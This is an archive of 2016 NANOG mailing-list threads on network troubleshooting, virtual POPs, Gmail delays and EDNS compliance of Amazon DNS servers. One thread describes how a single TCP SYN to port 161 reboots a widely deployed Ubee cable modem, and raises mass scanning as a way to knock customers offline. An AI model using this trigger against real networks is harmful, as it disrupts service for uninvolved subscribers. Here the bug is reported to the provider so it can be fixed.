In-Reply-To: <39495a84-08b6-5b77-5c5b-d15f5a77b565@lodpp.net>
References: <39495a84-08b6-5b77-5c5b-d15f5a77b565@lodpp.net>
Message-ID:

Hi Santosh

Likely it's disabled arp across broadcast (assuming both servers are on same broadcast domain). One can comment on it after looking at config of the port. I have seen similar case in some hosting providers who run shared vlans across customers and they block direct traffic among those servers. They usually put a static route of that pool towards gateway.

So e.g you have router on 10.10.10.1 and server 1 on 10.10.10.10, server 2 on 10.10.10.20. Now if direct layer 2 traffic is not allowed by tweaking broadcast domain, then you can route traffic from say server 1 (10.10.10.10) needs to speak to server 2 (10.10.10.20) then you can put 10.10.10.0/24 static via 10.10.10.1.
Whether or not that's a good idea depends heavily on the use case.

I hope this will help.

On Mon 15 Aug, 2016, 17:26 nico nanog, wrote:

> Hello,
>
> I cannot see any image in attachment.
>
> If you can ping from outside and not between them, wild guess it's not a
> L2 pbm.
>
> Are you able to see the arp of srv2 from srv1 ( and vice-versa )
>
> Without more info ( or it's maybe on the image I cannot see ) I would
> look in ACL somewhere/firewall on srv
>
>
> Rgd,
> Nico
>
>
> On 08/14/2016 11:59 PM, sathish kumar Ippani wrote:
> > Hello All,
> >
> > Thank you all in advance.
> >
> > We have connected two nexus 3048 Switches and two l2 Switches as below
> > using vPC and LACP.
> >
> > We have not seen any issues apart from one of VOIP server connected to
> > Switch 1 has lost access to VOIP Server connected Switch 2 and vice
> versa.
> >
> > Where I am able to ping both from Global. Can you please let me know what
> > went wrong here.
> >
> >
> > [image: Inline image 2]
> >
> >
> --
> Try and fail but never fail to try
>
>
--
Anurag Bhatia
http://anuragbhatia.com

From Dave.Siegel at level3.com Wed Aug 24 16:59:43 2016
From: Dave.Siegel at level3.com (Siegel, David)
Date: Wed, 24 Aug 2016 16:59:43 +0000
Subject: What's the meaning of virtual POP ?
In-Reply-To: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu>
References: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu>
Message-ID: <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com>

Different providers use the term with different definitions, but this is how we use it:

At Level 3, a VPOP is a POP that we operate under someone else's license. For example, we have VPOPs in a number of markets throughout the Asia Pacific region, including countries like China, Vietnam, Indonesia, and others.
We are buying a service from a partner that has an operating license in that country where they provide routers, entrance facilities, colo and other related infrastructure items, but we otherwise operate it as a full POP. It's in our OSS/BSS systems like any other location.

As far as our customers can tell, there is nothing virtual about it. It looks like any other node on our network, so the distinction is purely internal to our company and how we have to manage support for the site.

Dave

-----Original Message-----
From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mark Tinka
Sent: Wednesday, August 24, 2016 2:58 AM
To: Yucong Sun ; Rod Beck ; William Herrin
Cc: NANOG
Subject: Re: What's the meaning of virtual POP ?

On 24/Aug/16 01:20, Yucong Sun wrote:

> Thanks for the explanation.
>
> I understand on layer 2 or like William points out (on anything other
> than
> IP) it makes total sense.
>
> However on layer 3, with existing transit bandwidth with said provider
> it would be redundant. (Assume The one you wanted peer at site b is
> already peering with your provider).

The term "virtual PoP" is more commercial than it is technical.

As William mentioned, you are providing services via someone else's infrastructure. It is between you and that other network to determine how much of their infrastructure you will depend on. But ultimately, the objective is for you to reduce your exposure in what you would consider a new venture that still needs some proofing.

Mark.

From randy at psg.com Thu Aug 25 09:10:20 2016
From: randy at psg.com (Randy Bush)
Date: Thu, 25 Aug 2016 18:10:20 +0900
Subject: What's the meaning of virtual POP ?
In-Reply-To: <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com>
References: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com>
Message-ID:

> At Level 3, a VPOP is a POP that we operate under someone else's
> license. For example, we have VPOPs in a number of markets throughout
> the Asia Pacific region, including countries like China, Vietnam,
> Indonesia, and others. We are buying a service from a partner that
> has an operating license in that country where they provide routers,
> entrance facilities, colo and other related infrastructure items, but
> we otherwise operate it as a full POP. It's in our OSS/BSS systems
> like any other location.

how does this work for mpls vpn based services across continent/country? i.e. are there inter-provider mpls vpn issues?

randy

From mark.tinka at seacom.mu Thu Aug 25 09:32:22 2016
From: mark.tinka at seacom.mu (Mark Tinka)
Date: Thu, 25 Aug 2016 11:32:22 +0200
Subject: What's the meaning of virtual POP ?
In-Reply-To:
References: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com>
Message-ID:

On 25/Aug/16 11:10, Randy Bush wrote:

>
> how does this work for mpls vpn based services across continent/country?
> i.e. are there inter-provider mpls vpn issues?

Interestingly, being a relatively young player in the MPLS space, we see Africa slowly moving away from typical l3vpn services as more countries/cities/metros get fibre, as a result of businesses moving their IT infrastructure into some kind of cloud.

It's not happening quickly, but it is happening, and I think what the SD-WAN (yet another buzz word) boys are doing will only accelerate the process.

That has meant that the only progressive inter-provider MPLS NNI's we are seeing in/for the region are l2vpn's, and despite all the promises of BGP-driven l2vpn NNI's, I'd say all the l2vpn NNI's we are setting up are simple back-to-back VLAN's. Can't possibly mess those up :-).

Mark.

From gkuri at ieee.org Thu Aug 25 05:39:23 2016
From: gkuri at ieee.org (Gabriel Kuri)
Date: Wed, 24 Aug 2016 22:39:23 -0700
Subject: Charter HFC Engineer?
Message-ID:

Any Charter HFC engineers on the list?
I've been hitting my head on the wall with first tier support that involves the Ubee DDW365 cable modem Charter deploys that reboots when IP space sitting behind the cable modem is port scanned on port 161 (snmp). This all started when my original cable modem (SMC) was swapped out with the Ubee and I noticed the Internet would randomly go out during the day for about a minute or two and tracked it down to the Ubee modem rebooting throughout the day (lights flashing on the modem indicating boot up). A tech came out and swapped it with another Ubee, and the same issue, random reboots. After researching this issue, I found a post from April 2016 ( http://www.dslreports.com/forum/r30695574-Remote-triggered-modem-reboot) by someone posting about port scanning through the Ubee cable modem and the port scan causing the Ubee to reboot when it hit port 161. Apparently this person wasn't able to get through to Charter tech support about the problem either and gave up. After reading this post, I was able to confirm my Ubee was susceptible to this bug and would reboot by simply telneting to IP space on port 161 behind the modem. I figured my random reboots were related to random people port scanning my IP space throughout the day. I called support to let them know and got them to bump it up to their manager, who then referred it to a "technical specialist" that ended up blocking port 161 on my cable modem. That fixed the problem with the random reboots and my connection is now stable! However support seems to think blocking the port on my modem is a long term fix :( They don't seem to understand that the long term fix should be escalating this up the chain so an appropriate engineer can work with Ubee to get the firmware fixed in the modem or the tens of thousands (or millions?) of other Charter customers with this modem currently suffering through unstable Internet. 
And what's to stop someone from continuously port scanning all of the Charter IP space and essentially DOSing those customers with this Ubee modem? I'd appreciate if someone from Charter would contact me off list please, I have zero confidence this is actually going to get fixed the right way for myself or at all for all the other Charter customers with the Ubee modem deployed. Thanks ... From jared at puck.nether.net Thu Aug 25 16:27:38 2016 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 25 Aug 2016 12:27:38 -0400 Subject: Charter HFC Engineer? In-Reply-To: References: Message-ID: > On Aug 25, 2016, at 1:39 AM, Gabriel Kuri wrote: > > I'd appreciate if someone from Charter would contact me off list please, I > have zero confidence this is actually going to get fixed the right way for > myself or at all for all the other Charter customers with the Ubee modem > deployed. Have hope, I suspect someone will respond. (Can you send me your IP address off-list, I'd like to check against the OpenSNMPProject dataset as well). I've seen something similar with the Netgear device that Comcast Business deploys. It followed device swaps but I think it's related to internal traffic vs external and have not yet chased down what triggers it. - jared From Edwin.Mallette at charter.com Thu Aug 25 17:41:49 2016 From: Edwin.Mallette at charter.com (Mallette, Edwin J) Date: Thu, 25 Aug 2016 17:41:49 +0000 Subject: Charter HFC Engineer? In-Reply-To: References: Message-ID: Hi Gabriel, I'm going to contact you off-list regarding this one. Ed On 8/25/16, 1:39 AM, "NANOG on behalf of Gabriel Kuri" wrote: >Any Charter HFC engineers on the list? I've been hitting my head on the >wall with first tier support that involves the Ubee DDW365 cable modem >Charter deploys that reboots when IP space sitting behind the cable modem >is port scanned on port 161 (snmp).
> >This all started when my original cable modem (SMC) was swapped out with >the Ubee and I noticed the Internet would randomly go out during the day >for about a minute or two and tracked it down to the Ubee modem rebooting >throughout the day (lights flashing on the modem indicating boot up). A >tech came out and swapped it with another Ubee, and the same issue, random >reboots. After researching this issue, I found a post from April 2016 ( >http://www.dslreports.com/forum/r30695574-Remote-triggered-modem-reboot) >by >someone posting about port scanning through the Ubee cable modem and the >port scan causing the Ubee to reboot when it hit port 161. Apparently this >person wasn't able to get through to Charter tech support about the >problem >either and gave up. After reading this post, I was able to confirm my Ubee >was susceptible to this bug and would reboot by simply telneting to IP >space on port 161 behind the modem. I figured my random reboots were >related to random people port scanning my IP space throughout the day. I >called support to let them know and got them to bump it up to their >manager, who then referred it to a "technical specialist" that ended up >blocking port 161 on my cable modem. > >That fixed the problem with the random reboots and my connection is now >stable! However support seems to think blocking the port on my modem is a >long term fix :( > >They don't seem to understand that the long term fix should be escalating >this up the chain so an appropriate engineer can work with Ubee to get the >firmware fixed in the modem or the tens of thousands (or millions?) of >other Charter customers with this modem currently suffering through >unstable Internet. And what's to stop someone from continuously port >scanning all of the Charter IP space and essentially DOSing those >customers >with this Ubee modem? 
> >I'd appreciate if someone from Charter would contact me off list please, I >have zero confidence this is actually going to get fixed the right way for >myself or at all for all the other Charter customers with the Ubee modem >deployed. > >Thanks ... From cscora at apnic.net Fri Aug 26 18:01:43 2016 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 27 Aug 2016 04:01:43 +1000 (AEST) Subject: Weekly Routing Table Report Message-ID: <20160826180143.4B199A7543@thyme.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, SAFNOG, SdNOG, BJNOG, CaribNOG and the RIPE Routing WG. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 27 Aug, 2016 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/
From mike-nanog at tiedyenetworks.com Fri Aug 26 18:11:21 2016 From: mike-nanog at tiedyenetworks.com (Mike) Date: Fri, 26 Aug 2016 11:11:21 -0700 Subject: Charter HFC Engineer? In-Reply-To: References: Message-ID: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> On 08/24/2016 10:39 PM, Gabriel Kuri wrote: > I was able to confirm my Ubee > was susceptible to this bug and would reboot by simply telneting to IP > space on port 161 behind the modem. I figured my random reboots were > related to random people port scanning my IP space throughout the day. I > called support to let them know and got them to bump it up to their > manager, who then referred it to a "technical specialist" that ended up > blocking port 161 on my cable modem. Not to be unhelpful, but SNMP is a UDP protocol, you can't "telnet" to port 161 and be talking to the snmp daemon on the device because it's not listening for that. If you do get a connection, there's really something wrong.... -- Mike Ireton WillitsOnline LLC From jay at west.net Fri Aug 26 19:03:03 2016 From: jay at west.net (Jay Hennigan) Date: Fri, 26 Aug 2016 12:03:03 -0700 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: On 8/24/16 8:13 AM, Arqam Gadit wrote: > Hello guys, > > I am looking for a global network with: > > - lowest possible latency > - lowest possible jitter (packet loss and latency variation) > - lowest possible monetary cost You asked for: - Fast - Good - Cheap Sorry, but you're only allowed to choose two.
-- Jay Hennigan - CCIE #7880 - Network Engineering - jay at impulse.net Impulse Internet Service - http://www.impulse.net/ Your local telephone and internet company - 805 884-6323 - WB6RDV From nate at dopedesign.com Thu Aug 25 20:10:14 2016 From: nate at dopedesign.com (Nate Metheny) Date: Thu, 25 Aug 2016 14:10:14 -0600 Subject: Why the internal network delays, Gmail? Message-ID: Help (and hi)! I work in higher education and we've been experiencing problems with Google delaying or queuing email for delivery to our domain. Here's some truncated email headers: ** Example 1: X-Received: by 10.237.55.65 with SMTP id i59mr10986018qtb.62.1472137448952; Thu, 25 Aug 2016 08:04:08 -0700 (PDT) Received: by mail-qt0-f175.google.com with SMTP id u25so27419242qtb.1 for <@***>; Thu, 25 Aug 2016 12:05:46 -0700 (PDT) ** Example 2: X-Received: by 10.36.1.75 with SMTP id 72mr5275579itk.40.1472130531887; Thu, 25 Aug 2016 06:08:51 -0700 (PDT) Received: by mail-it0-f48.google.com with SMTP id x131so289116132ite.0 for <@***>; Thu, 25 Aug 2016 11:50:42 -0700 (PDT) In both of these examples, these emails haven't even left Google's internal network yet; I'm getting blamed for these delays, however there is no delay in receiving these emails after they leave Google's network. Are other people having this same problem? I've tested delivery to my network from many outside sources and all SMTP requests go through without delay; this issue seems to be exclusive to Google-hosted and Gmail accounts and domains. -- Nate nate at dopedesign.com From gkuri at ieee.org Fri Aug 26 18:27:49 2016 From: gkuri at ieee.org (Gabriel Kuri) Date: Fri, 26 Aug 2016 11:27:49 -0700 Subject: Charter HFC Engineer? In-Reply-To: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> References: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> Message-ID: Mike, SNMPv3 uses TCP.
Also, I never said I had a daemon listening on port 161, the cable modem would simply reboot if it saw a TCP SYN packet destined to port 161 to IP address space sitting behind my cable modem. FYI - Charter engineers responded to me indicating it's a known bug with this Ubee modem and Ubee is working on a new revision of firmware to fix the bug. On Fri, Aug 26, 2016 at 11:11 AM, Mike wrote: > > > On 08/24/2016 10:39 PM, Gabriel Kuri wrote: > >> I was able to confirm my Ubee >> was susceptible to this bug and would reboot by simply telneting to IP >> space on port 161 behind the modem. I figured my random reboots were >> related to random people port scanning my IP space throughout the day. I >> called support to let them know and got them to bump it up to their >> manager, who then referred it to a "technical specialist" that ended up >> blocking port 161 on my cable modem. >> > Not to be unhelpful, but SNMP is a UDP protocol, you can't "telnet" to > port 161 and be talking to the snmp daemon on the device because it's not > listening for that. If you do get a connection, there's really something > wrong.... > > > -- > Mike Ireton > WillitsOnline LLC > > From johnl at iecc.com Fri Aug 26 20:12:23 2016 From: johnl at iecc.com (John Levine) Date: 26 Aug 2016 20:12:23 -0000 Subject: Why the internal network delays, Gmail? In-Reply-To: Message-ID: <20160826201223.42561.qmail@ary.lan> In article you write: >Help (and hi)! > >I work in higher education and we've been experiencing problems with Google >delaying or queuing email for delivery to our domain. This is a question for Google, not for nanog. Only they know how their network is set up and how their mail servers are managed. R's, John PS: Also keep in mind that sometimes free services are worth what you pay for them. From nate at dopedesign.com Fri Aug 26 20:46:27 2016 From: nate at dopedesign.com (Nate Metheny) Date: Fri, 26 Aug 2016 14:46:27 -0600 Subject: Why the internal network delays, Gmail?
In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> Message-ID: Thanks, John. I was in contact with Google and after some convincing and detailed header information, they acknowledged that they are having internal MX issues and assure me that they will deal with the issue promptly. Initially they did not even acknowledge that there was a problem, so it took several tiers of support people to finally see the issue. I look forward to the ongoing exchanges on the list. On Fri, Aug 26, 2016 at 2:45 PM, Nate Metheny wrote: > Thanks, John. > > I was in contact with Google and after some convincing and detailed header > information, they acknowledged that they are having internal MX issues and > assure me that they will deal with the issue promptly. > > Initially they did not even acknowledge that there was a problem, so it > took several tiers of support people to finally see the issue. > > I look forward to the ongoing exchanges on the list. > > On Fri, Aug 26, 2016 at 2:12 PM, John Levine wrote: > >> In article > gmail.com> you write: >> >Help (and hi)! >> > >> >I work in higher education and we've been experiencing problems with >> Google >> >delaying or queuing email for delivery to our domain. >> >> This is a question for Google, not for nanog. Only they know how their >> network >> is set up and how their mail servers are managed. >> >> R's, >> John >> >> PS: Also keep in mind that sometimes free services are worth what you pay >> for them. >> >> > > > -- > > Nate Metheny > natemetheny at gmail.com > -- Nate Metheny natemetheny at gmail.com From mel at beckman.org Fri Aug 26 20:53:05 2016 From: mel at beckman.org (Mel Beckman) Date: Fri, 26 Aug 2016 20:53:05 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160826201223.42561.qmail@ary.lan> References: , <20160826201223.42561.qmail@ary.lan> Message-ID: <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> John, With all due respect, it's S.O.P.
for Nanogen to ask the list if anyone else is experiencing a particular problem with some carrier or another. So Nate's question is totally appropriate for this list. I know I've solved several problems by airing them here and getting insight from other list members. -mel beckman > On Aug 26, 2016, at 4:13 PM, John Levine wrote: > > In article you write: >> Help (and hi)! >> >> I work in higher education and we've been experiencing problems with Google >> delaying or queuing email for delivery to our domain. > > This is a question for Google, not for nanog. Only they know how their network > is set up and how their mail servers are managed. > > R's, > John > > PS: Also keep in mind that sometimes free services are worth what you pay for them. > From jeffg at opennms.org Fri Aug 26 21:28:19 2016 From: jeffg at opennms.org (Jeff Gehlbach) Date: Fri, 26 Aug 2016 17:28:19 -0400 Subject: Charter HFC Engineer? In-Reply-To: References: <2b15a790-64eb-b269-abb1-3343f72e516c@tiedyenetworks.com> Message-ID: <16b0b037-b147-daa7-02bd-1c41592f2607@opennms.org> On 08/26/2016 02:27 PM, Gabriel Kuri wrote: > SNMPv3 uses TCP. FWIW, TCP is one of many possible transports for SNMPv3. UDP is by far the commonest in my experience, though. > FYI - Charter engineers responded to me indicating it's a known bug with > this Ubee modem and Ubee is working on a new revision of firmware to fix > the bug. Ouch. I'll have to check whether the Ubee unit on my Comcast Business connection is similarly affected. SNMP-related bugs are a dime a dozen, but this one sounds really awful. -jeff From g at 1337.io Fri Aug 26 22:17:12 2016 From: g at 1337.io (g at 1337.io) Date: Fri, 26 Aug 2016 15:17:12 -0700 Subject: Can someone from Amazon please answer.
In-Reply-To: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> Message-ID: I would love to hear Amazon's response to this very question! On 8/23/16 4:37 PM, Mark Andrews wrote: > I'm curious. What are you trying to achieve by blocking EDNS version > negotiation? Is it really too hard to return BADVERS to a EDNS > query with version != 0 along with the version of EDNS you support > in the version field? Are you deliberately trying to prevent the > IETF from deciding to bump the EDNS version in the future? Do you > have firewalls that have this behaviour hard coded? Do you even > test for RFC compliance? > > Mark > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > From josh at kyneticwifi.com Fri Aug 26 22:33:27 2016 From: josh at kyneticwifi.com (Josh Reynolds) Date: Fri, 26 Aug 2016 17:33:27 -0500 Subject: Can someone from Amazon please answer. In-Reply-To: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> Message-ID: Just looking at the RFC... ----- VERSION Indicates the implementation level of the setter. Full conformance with this specification is indicated by version '0'. 
Requestors are encouraged to set this to the lowest implemented level capable of expressing a transaction, to minimise the responder and network load of discovering the greatest common implementation level between requestor and responder. A requestor's version numbering strategy MAY ideally be a run-time configuration option. If a responder does not implement the VERSION level of the request, then it MUST respond with RCODE=BADVERS. All responses MUST be limited in format to the VERSION level of the request, but the VERSION of each response SHOULD be the highest implementation level of the responder. In this way, a requestor will learn the implementation level of a responder as a side effect of every response, including error responses and including RCODE=BADVERS. ----- What am I missing, based on your output? On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > > I'm curious. What are you trying to achieve by blocking EDNS version > negotiation? Is it really too hard to return BADVERS to a EDNS > query with version != 0 along with the version of EDNS you support > in the version field? Are you deliberately trying to prevent the > IETF from deciding to bump the EDNS version in the future? Do you > have firewalls that have this behaviour hard coded? Do you even > test for RFC compliance? > > Mark > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > lostoncampus.com.au. 
@205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > From blakjak at blakjak.net Fri Aug 26 23:16:21 2016 From: blakjak at blakjak.net (Mark Foster) Date: Sat, 27 Aug 2016 11:16:21 +1200 Subject: Why the internal network delays, Gmail? In-Reply-To: <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> Message-ID: <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Hi Mel, There's another mailing list called 'mailop' which is probably more appropriate for email related problems, than NANOG. And in response to Nate: > I was in contact with Google and after some convincing and detailed header > information, they acknowledged that they are having internal MX issues and > assure me that they will deal with the issue promptly. > > Initially they did not even acknowledge that there was a problem, so it > took several tiers of support people to finally see the issue. > > I look forward to the ongoing exchanges on the list. Useful to know, but John is right - as cited, working through Google's support process, got somewhere. Further exchanges on NANOG are probably inappropriate. A group like 'mailop' probably has a higher care factor, however. (I would also note that email delays that are demonstratably outside of your network (as headers will show) are very easily painted as something beyond your control, and the nature of email is very much 'best effort', so anyone playing the blame game needs a reality check. Just because email exchanges 'are often' near-instantaneous, does not mean they always will be.) Mark. On 27/08/2016 8:53 a.m., Mel Beckman wrote: > John, > > With all due respect, it's S.O.P. 
for Nanogen to ask the list if anyone else is experiencing a particular problem with some carrier or another. So Nate's question is totally appropriate for this list. I know I've solved several problems by airing them here and getting insight from other list members. > > -mel beckman > *snip* From nate at dopedesign.com Fri Aug 26 23:31:59 2016 From: nate at dopedesign.com (Nate Metheny) Date: Fri, 26 Aug 2016 17:31:59 -0600 Subject: Why the internal network delays, Gmail? In-Reply-To: <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: I was working within the limits of what I had available. I apologize if people on the list consider a network and systems administrator reaching out to peers for assistance with a particular problem that is clearly network related is inappropriate for a network operations group list that may or may not have Google or Google affiliated employees or contractors on it. I will use more discretion in the future. -- Sent from a phone. Please excuse the brevity of this message and any typographical errors. On Aug 26, 2016 17:18, "Mark Foster" wrote: > Hi Mel, There's another mailing list called 'mailop' which is probably > more appropriate for email related problems, than NANOG. > > And in response to Nate: > > I was in contact with Google and after some convincing and detailed header >> information, they acknowledged that they are having internal MX issues and >> assure me that they will deal with the issue promptly. >> >> Initially they did not even acknowledge that there was a problem, so it >> took several tiers of support people to finally see the issue. >> >> I look forward to the ongoing exchanges on the list. >> > > Useful to know, but John is right - as cited, working through Google's > support process, got somewhere. 
> Further exchanges on NANOG are probably inappropriate. A group like > 'mailop' probably has a higher care factor, however. > > (I would also note that email delays that are demonstratably outside of > your network (as headers will show) are very easily painted as something > beyond your control, and the nature of email is very much 'best effort', so > anyone playing the blame game needs a reality check. Just because email > exchanges 'are often' near-instantaneous, does not mean they always will > be.) > > > Mark. > > > > On 27/08/2016 8:53 a.m., Mel Beckman wrote: > >> John, >> >> With all due respect, it's S.O.P. for Nanogen to ask the list if anyone >> else is experiencing a particular problem with some carrier or another. So >> Nate's question is totally appropriate for this list. I know I've solved >> several problems by airing them here and getting insight from other list >> members. >> >> -mel beckman >> >> *snip* > From marka at isc.org Fri Aug 26 23:53:10 2016 From: marka at isc.org (Mark Andrews) Date: Sat, 27 Aug 2016 09:53:10 +1000 Subject: Can someone from Amazon please answer. In-Reply-To: Your message of "Fri, 26 Aug 2016 17:33:27 -0500." References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> Message-ID: <20160826235310.4E9FD528F414@rock.dv.isc.org> In message , Josh Reynolds writes: > > Just looking at the RFC... > ----- > VERSION Indicates the implementation level of the setter. Full conformance > with this specification is indicated by version '0'. Requestors are > encouraged to set this to the lowest implemented level capable of > expressing a transaction, to minimise the responder and network load of > discovering the greatest common implementation level between requestor and > responder. A requestor's version numbering strategy MAY ideally be a > run-time configuration option. If a responder does not implement the > VERSION level of the request, then it MUST respond with RCODE=BADVERS. 
All
> responses MUST be limited in format to the VERSION level of the request,
> but the VERSION of each response SHOULD be the highest implementation level
> of the responder. In this way, a requestor will learn the implementation
> level of a responder as a side effect of every response, including error
> responses and including RCODE=BADVERS.
> -----
> What am I missing, based on your output?

The servers do not RESPOND to EDNS version != 0 queries. The following
sends an EDNS version 1 query and tells dig not to complete the EDNS version
negotiation so you can see the BADVERS response.

% dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa

; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa
;; global options: +cmd
;; connection timed out; no servers could be reached
%

An EDNS version 0 query to show reachability and that EDNS is supported.

% dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa

; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;lostoncampus.com.au. IN SOA

;; ANSWER SECTION:
lostoncampus.com.au. 900 IN SOA ns-1222.awsdns-24.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400

;; AUTHORITY SECTION:
lostoncampus.com.au. 172800 IN NS ns-1222.awsdns-24.org.
lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk.
lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com.
lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net.

;; Query time: 126 msec
;; SERVER: 205.251.195.156#53(205.251.195.156)
;; WHEN: Sat Aug 27 09:40:29 EST 2016
;; MSG SIZE rcvd: 248

%

What you should see is something like the following.
Note the version field is zero (0) and the rcode (status) field is BADVERS.
This response does show a protocol error: AD should not be set in
this response as there is no authenticated data.

% dig . @a.root-servers.net +edns=1 +noednsneg soa

; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570
;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; Query time: 438 msec
;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30)
;; WHEN: Sat Aug 27 09:34:32 EST 2016
;; MSG SIZE rcvd: 23

%

Amazon are not alone here (about 20% of servers fail to respond to
EDNS version 1 queries) but they are a big player so they should be
doing things correctly. See
https://ednscomp.isc.org/compliance/alexa-report.html for others
serving the Alexa top 1000 that get things wrong; there are a lot
of you out there. There are also reports for the bottom 1000, .GOV,
.AU and the root zone at https://ednscomp.isc.org along with an
online compliance checker so others can test their servers. You
just need to name a zone and it will work out the rest or you can
target individual servers even those not listed in the NS RRset.

There is also a whole series of graphs showing failure trends for
different EDNS compliance tests at
https://ednscomp.isc.org/compliance/summary.html

Mark

> On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote:
>
> >
> > I'm curious. What are you trying to achieve by blocking EDNS version
> > negotiation? Is it really too hard to return BADVERS to a EDNS
> > query with version != 0 along with the version of EDNS you support
> > in the version field? Are you deliberately trying to prevent the
> > IETF from deciding to bump the EDNS version in the future? Do you
> > have firewalls that have this behaviour hard coded?
